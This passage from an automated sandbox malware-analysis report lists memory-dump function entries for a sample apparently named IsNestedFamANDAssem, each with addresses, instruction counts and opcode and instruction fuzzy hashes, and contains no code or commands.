                                                                  • Instruction Fuzzy Hash: 745159B4D05218CFEB94EFA6D9847EEBBB2FF48300F90816AD415A7244D7745A42CFA1
                                                                  Function 06C43A78 Relevance: .2, Instructions: 156COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aecf47821a32394906b164aaa0a1b5877e06a7ba7255bcc3773238c1ec55e790
                                                                  • Instruction ID: 13ab008ed9042781b52c83fe626e6693190998b6b2f3533ec770209895da1e0e
                                                                  • Opcode Fuzzy Hash: aecf47821a32394906b164aaa0a1b5877e06a7ba7255bcc3773238c1ec55e790
                                                                  • Instruction Fuzzy Hash: 6761A4B4E00659CFDB44EFAAC4849ACBBF1FF89310F10856AE91AAB360D7309905CF54
                                                                  Function 05DBD64B Relevance: .2, Instructions: 154COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: de918e2c4fa3b83116922c49c287c71b51b02c6237751cb97a04961f38ab13f2
                                                                  • Instruction ID: 1df93d0852e019512a3b2aa1957d389dc892e9c986fb3a320dd315034c45e52e
                                                                  • Opcode Fuzzy Hash: de918e2c4fa3b83116922c49c287c71b51b02c6237751cb97a04961f38ab13f2
                                                                  • Instruction Fuzzy Hash: 04512BB0D00618DFDB54EFA9D880AEDBBF7FF89304F50856AE459A7240DB74A985CB40
                                                                  Function 05DBFA98 Relevance: .2, Instructions: 152COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 45e7d0869acbaa19e8d437d125919a50eb861a964cb4a9fbc141c2eaf4a9de41
                                                                  • Instruction ID: 31a86c57e027843a0026ece24ce179352e1330099698371b33010e414fcc2157
                                                                  • Opcode Fuzzy Hash: 45e7d0869acbaa19e8d437d125919a50eb861a964cb4a9fbc141c2eaf4a9de41
                                                                  • Instruction Fuzzy Hash: BF51F9B5D04209CFDB44DFA9D894AEEBBF6FB48300F60902AD506A7354EB785985CF84
                                                                  Function 06C43A69 Relevance: .2, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 241d1a443e5d5fb89f213581bc9433cda2d965c2cdf6e35c093d0f9521e3a511
                                                                  • Instruction ID: 4f5345d043eaa99fbd003e7aff8a0446d78ee71ef79df844b09e55f928ef509b
                                                                  • Opcode Fuzzy Hash: 241d1a443e5d5fb89f213581bc9433cda2d965c2cdf6e35c093d0f9521e3a511
                                                                  • Instruction Fuzzy Hash: 50619478E00658DFDB44EFAAD48499CBBF1FF89310F10856AE91AAB360D730A905CF54
                                                                  Function 05DB7694 Relevance: .1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64c391256f5696559b70ca67d409872bc2b84ba9879cf149b9c1da7a8ce0a1bc
                                                                  • Instruction ID: 1e3788579b369a5d79e24a52377a4fd65995bc4584b461bb5e42bc3911c0d8a8
                                                                  • Opcode Fuzzy Hash: 64c391256f5696559b70ca67d409872bc2b84ba9879cf149b9c1da7a8ce0a1bc
                                                                  • Instruction Fuzzy Hash: 8A51C274A06218CFEB90DF69D884BEDBBB6FB89304F5080AAD41AA7251DB745D80CF41
                                                                  Function 06C45BE9 Relevance: .1, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 28caa73f9afa2f525249d58c2efbb04a4832ff6db1b8dc95083f7165443a9c69
                                                                  • Instruction ID: 8958a2478556e3e8f392661f080b199921fbcd759bf0be365ea6e54ad481b1e1
                                                                  • Opcode Fuzzy Hash: 28caa73f9afa2f525249d58c2efbb04a4832ff6db1b8dc95083f7165443a9c69
                                                                  • Instruction Fuzzy Hash: 7851F8B4D05218CFDB94EFAAD5846EDBBB2FF48304FA0812AD406A7254D7745E42CF91
                                                                  Function 05DB7628 Relevance: .1, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 132fea92714d9ac8c70a1fb2ba7a43b4a577726c188b36731bf5e5a91c709c84
                                                                  • Instruction ID: f190067c40bcf6c97846447a5e51a7751eeb24379af31fe6fe9af682ba103278
                                                                  • Opcode Fuzzy Hash: 132fea92714d9ac8c70a1fb2ba7a43b4a577726c188b36731bf5e5a91c709c84
                                                                  • Instruction Fuzzy Hash: E7510374A06208CBEB94DF69D884BEDBBB7FB89300F5080AAD419A7350DB745D85CF81
                                                                  Function 05DB76F2 Relevance: .1, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12f699d24f9f071ff49f1ad4208a9f569e23b3b26b4ae865819064d441e96843
                                                                  • Instruction ID: 2229017ac984968cbb28a76558f54c474465de1e9453540e176712df53d46550
                                                                  • Opcode Fuzzy Hash: 12f699d24f9f071ff49f1ad4208a9f569e23b3b26b4ae865819064d441e96843
                                                                  • Instruction Fuzzy Hash: 4651B174E06218CFEB90DF69D884BEDBBB2FB85304F5081AAD419A7251DB745D81CF81
                                                                  Function 06C471F0 Relevance: .1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fa9d21f2853b9cf87dd2d1167ac9c92e936b0a3f5ddf3dbf31b26d6f2fd44e6
                                                                  • Instruction ID: d96292359a61ae14c1da16743d1f07312d55dc51caa6e0b7bfcc92896d04ff0b
                                                                  • Opcode Fuzzy Hash: 8fa9d21f2853b9cf87dd2d1167ac9c92e936b0a3f5ddf3dbf31b26d6f2fd44e6
                                                                  • Instruction Fuzzy Hash: C151B5B4D01208DFDB68DFB9D594AADBBF2BF88300F60812AE815AB354DB359941CF50
                                                                  Function 05DBD658 Relevance: .1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bf3699c46c58d1c55a1b2f72c7c9befd512689c73031171259868f6f634109f
                                                                  • Instruction ID: 0197d66baa99e18af425fcd20bb4c3b438b66e2530b0db2cf09703d5d9ad694c
                                                                  • Opcode Fuzzy Hash: 6bf3699c46c58d1c55a1b2f72c7c9befd512689c73031171259868f6f634109f
                                                                  • Instruction Fuzzy Hash: 71411AB4D00619DBDB14EFA9D840ADDBBB6FF89310F10951AE45AB7244DB74A885CF80
                                                                  Function 06C471E0 Relevance: .1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2083362c7a6f428415fd0023bc5deda78971514327b05be46a5281bc29822322
                                                                  • Instruction ID: 987a30435bf3e1885d61ad0d102e04cb65a03473df446cfef506f7cd422a7adc
                                                                  • Opcode Fuzzy Hash: 2083362c7a6f428415fd0023bc5deda78971514327b05be46a5281bc29822322
                                                                  • Instruction Fuzzy Hash: 3841C670D01208DFDB68DFB9C454A9DBBF2BF88301F64852EE815AB254DB359981CF50
                                                                  Function 06C4FC58 Relevance: .1, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 88817f82d99470591531f48a823927794fcf0f31a2c5a541dfce8917b87c500f
                                                                  • Instruction ID: 25a1c589cd0fab4de3f3f6f879f84ab37c49c63118083a6011a9fb1eeec0bfb0
                                                                  • Opcode Fuzzy Hash: 88817f82d99470591531f48a823927794fcf0f31a2c5a541dfce8917b87c500f
                                                                  • Instruction Fuzzy Hash: 33310974E04209DFDB44EFAAD4446EEBBF6EB89304F10C069D929A7358DB345945CF90
                                                                  Function 0134150C Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: caee35ad30e342f22decec9dc5c1b39376fa8676b3afb108bbdfa388f75a0f87
                                                                  • Instruction ID: 43466b304b606135599656933b51e6fe2a5961b51129fa9e349b9f62d4a542bf
                                                                  • Opcode Fuzzy Hash: caee35ad30e342f22decec9dc5c1b39376fa8676b3afb108bbdfa388f75a0f87
                                                                  • Instruction Fuzzy Hash: 40315970D01249DFDB10DFA9D584AEEBFF6AF48354F24842AE909AB250CB74A945CF90
                                                                  Function 01340BF8 Relevance: .1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 379f7c56d2e5d3b5b25dea7a2542ca291d929ff1edf17270086734480383c8b1
                                                                  • Instruction ID: adb5ace4e1d9c57905cc505427e440229e59b7408713944ece835425c0785ef0
                                                                  • Opcode Fuzzy Hash: 379f7c56d2e5d3b5b25dea7a2542ca291d929ff1edf17270086734480383c8b1
                                                                  • Instruction Fuzzy Hash: 3921EE31B00309CFCF099B6984586FD77FAFB89218B104569E6029F640CF366D86CB9A
                                                                  Function 01341518 Relevance: .1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 110ccb9f6460b187ee1d35c2b74cfef630bbe1cff67405aebd1761b2b6c25994
                                                                  • Instruction ID: 02c118e8a70540cae1a532d30dd1aaeb8736ef56dcee248e79f4ac71a2eda283
                                                                  • Opcode Fuzzy Hash: 110ccb9f6460b187ee1d35c2b74cfef630bbe1cff67405aebd1761b2b6c25994
                                                                  • Instruction Fuzzy Hash: FB315A70D01249DFDB10CFAAC594AEEBFF6AF48354F248029E909AB350DB34A945CF90
                                                                  Function 05DB6F84 Relevance: .1, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7077861fee010c0902ac985667984cba19ecd8979f3205be179685e4e1905a59
                                                                  • Instruction ID: 4f0e7d726bb1824051eee0ac2e4a16338ea83c094627f3666967eb71b3b8ac03
                                                                  • Opcode Fuzzy Hash: 7077861fee010c0902ac985667984cba19ecd8979f3205be179685e4e1905a59
                                                                  • Instruction Fuzzy Hash: 2F41E474A00229CFDB94DF68D895BE9BBB2FB89300F4080AAD55DA7351DB349D81CF90
                                                                  Function 05DBC808 Relevance: .1, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ed082d4c1d126e044803a9b45a18cfbc81179f1104f2374ba8d778bf67bc2ec0
                                                                  • Instruction ID: dd7cfa6ad5093b267f3ba4bd61ea223ae2d3afababbb04574c5ea85f3ceac6a1
                                                                  • Opcode Fuzzy Hash: ed082d4c1d126e044803a9b45a18cfbc81179f1104f2374ba8d778bf67bc2ec0
                                                                  • Instruction Fuzzy Hash: B6314A74E14209CFEB44CF6AD841AEEBBF6FB89300F50806AD45AA7290DB749D45CB91
                                                                  Function 06B61E8F Relevance: .1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69724967697.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6b60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13aa0b938f9188a93a4a8cb924d686873132abc6420d6fbc3daa8bb3d05446c1
                                                                  • Instruction ID: d232be158a7ecfe753b2729e26676a623dcb6fe8b4cf18b20930acec4684774f
                                                                  • Opcode Fuzzy Hash: 13aa0b938f9188a93a4a8cb924d686873132abc6420d6fbc3daa8bb3d05446c1
                                                                  • Instruction Fuzzy Hash: 2731A0B0D04249CFEB59CFAAD4146EEBBB1FF85301F1080EAE055A7291C7384A45CFA1
                                                                  Function 05DBC918 Relevance: .1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f12d27eac2591c4962a67903ca5cc7cdf95ef3e17611e49f45e876f849f618b2
                                                                  • Instruction ID: 5248c5373c86916f37adc34ac5416c2c7f15f5340cf40ea4048a4361754634b1
                                                                  • Opcode Fuzzy Hash: f12d27eac2591c4962a67903ca5cc7cdf95ef3e17611e49f45e876f849f618b2
                                                                  • Instruction Fuzzy Hash: DC217E74E0020ADFDB44DF69D840AEEB7F6FB89300F908076D41AA7250DB749D41CB95
                                                                  Function 05DB9379 Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d117d6c227b46d77b0611b468b4fd49722868ebb6b62795da0171d03b13d88e
                                                                  • Instruction ID: 794060f04f3ce6cada5d6172be336920a744367f34f4c850be80eb44c5e2326e
                                                                  • Opcode Fuzzy Hash: 1d117d6c227b46d77b0611b468b4fd49722868ebb6b62795da0171d03b13d88e
                                                                  • Instruction Fuzzy Hash: FB31A070A05259CFEBA4DF58C894BE9B7B2BB49304F5080DAD10EA7250CB759EC5CF14
                                                                  Function 0102D030 Relevance: .1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69696028514.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_102d000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e041b213ddc0d3cf8eca14f94a64838c24f6e1fccb2e290a35f4c4f5b9146cf
                                                                  • Instruction ID: 92a0fd2875cb9098066e984451cd5a2b045a4ef557423a67f39a0e4dfcfd44b7
                                                                  • Opcode Fuzzy Hash: 6e041b213ddc0d3cf8eca14f94a64838c24f6e1fccb2e290a35f4c4f5b9146cf
                                                                  • Instruction Fuzzy Hash: 48210771504240EFDB11DF58E9C4B1ABFA5FB84314F24C5ADED450B256C33AD846CBA2
                                                                  Function 05DBC818 Relevance: .1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75d73422c4d0a44eba67253bad94475cbb36886b6aac66564e8533ea2dc1798e
                                                                  • Instruction ID: 81741bca17333b11515757c948068d59a0e462f5163db14a3a1b0516985ed358
                                                                  • Opcode Fuzzy Hash: 75d73422c4d0a44eba67253bad94475cbb36886b6aac66564e8533ea2dc1798e
                                                                  • Instruction Fuzzy Hash: B8212B74E14209CFDB44CF6AD841AEEB7F6FB89300F50806AD41AA7354DBB49D41CB95
                                                                  Function 05DB7350 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4d620db81f536dd80b639163216973e268f9b74569105ceb6a2b9980c8fc5325
                                                                  • Instruction ID: 2dd0e43e349b18fa287eef7403a810cd969c9d70eb21769ff2fb2abb3bb7e0f0
                                                                  • Opcode Fuzzy Hash: 4d620db81f536dd80b639163216973e268f9b74569105ceb6a2b9980c8fc5325
                                                                  • Instruction Fuzzy Hash: AC219C74D04209CFEB00DFA9D8516EEBBF2FB89304F40816AD466A3344CB785A45CF91
                                                                  Function 0134FDB8 Relevance: .1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4bf1d762166656de8022bba57ff408c6ade15541824596e9c5990844d03d4c11
                                                                  • Instruction ID: b684c7e274d01424ec640e0c1236ff17cfb51434f8fc1e6dea853b2b2f5bf984
                                                                  • Opcode Fuzzy Hash: 4bf1d762166656de8022bba57ff408c6ade15541824596e9c5990844d03d4c11
                                                                  • Instruction Fuzzy Hash: B0314835E00219EFCB14DFA9E894AEEBBF6FF49304F10812AE505A7254CB356941CFA1
                                                                  Function 013423C8 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4814ba1c4e809db30c7f9bfd2a3a1257a8c12fd0057602fbab823a0998197353
                                                                  • Instruction ID: e79e8778b130b38de9b0e8352bed49dcb21ebb28bfe3acdb040585a4990423fe
                                                                  • Opcode Fuzzy Hash: 4814ba1c4e809db30c7f9bfd2a3a1257a8c12fd0057602fbab823a0998197353
                                                                  • Instruction Fuzzy Hash: BB2178B0904218DFDB21DFA9D0483AEBBF5EB4A309F1080AAE458B3746DB791984CB51
                                                                  Function 05DB7360 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: de3434808f06ac8e24c4216fa22c46a3deab3e92baeee3439866998dedf1dc24
                                                                  • Instruction ID: b8dcbc068c7aa5ba86550034adb36c8df97a5bc87b096e640ccc5d393bb961ab
                                                                  • Opcode Fuzzy Hash: de3434808f06ac8e24c4216fa22c46a3deab3e92baeee3439866998dedf1dc24
                                                                  • Instruction Fuzzy Hash: 8F217F74D04209CFEB00DFA9D8456EEBBF6FB89304F50816AD466A7344DB789A41CF91
                                                                  Function 06C478F0 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65d35f5ffe005d343e21731bf7363bde7b7f288c3be9b0cb75f910a80f6357f4
                                                                  • Instruction ID: 4ca2d712e033d9f615c83b67bdda27dfe19d081a4e453abb06221deb8731c154
                                                                  • Opcode Fuzzy Hash: 65d35f5ffe005d343e21731bf7363bde7b7f288c3be9b0cb75f910a80f6357f4
                                                                  • Instruction Fuzzy Hash: 66213E70D04209DFDB54EFAAC4446AEBBB6FF88310F208569C855A7344D7359A81CFA1
                                                                  Function 07030A1E Relevance: .1, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23a70ffefd756c09331ed85078e30fbead5cd30b1224f81895be1b138dfbbe07
                                                                  • Instruction ID: ca3f2234d26d394a5b69d4be16ea8dad9fc4769c7410cea04567f3173eb87405
                                                                  • Opcode Fuzzy Hash: 23a70ffefd756c09331ed85078e30fbead5cd30b1224f81895be1b138dfbbe07
                                                                  • Instruction Fuzzy Hash: F1319278A02269CFDB64CF28DD84AD8B7F1FB0A304F1045D9E819A7B44D7349E818F52
                                                                  Function 05DBBDE8 Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fa15875cb5c8d68888103a368346cf46625836de3114cad48551af1b4c99e8cc
                                                                  • Instruction ID: 829ecdc515f0334b965e7c71d2aff9ef92fd2de19b4686c6ffe436a7823c8600
                                                                  • Opcode Fuzzy Hash: fa15875cb5c8d68888103a368346cf46625836de3114cad48551af1b4c99e8cc
                                                                  • Instruction Fuzzy Hash: 5731B074A01228CFEB94DF69C980BD8BBB2FB48305F5081AAE54DA7354DB349E81CF50
                                                                  Function 06C478E0 Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f5d45c3639f5f0ffd8b13b5a886786e561b0a25de8dee73aa9198440b79e46c
                                                                  • Instruction ID: 1e68c1f1f68832b21fcf3d2322b9c6b30984c1dc347f9093ddb6bc0a3b333aac
                                                                  • Opcode Fuzzy Hash: 2f5d45c3639f5f0ffd8b13b5a886786e561b0a25de8dee73aa9198440b79e46c
                                                                  • Instruction Fuzzy Hash: 7C213DB0D05309CFDB94DF6AC9442ADBBF2FB89300F1584AAC449E7215D7354A41CFA1
                                                                  Function 013423D8 Relevance: .1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d48551babb6942a697159dabbfd5941ccc16a78906d38616b5e946e2a3cc5ad5
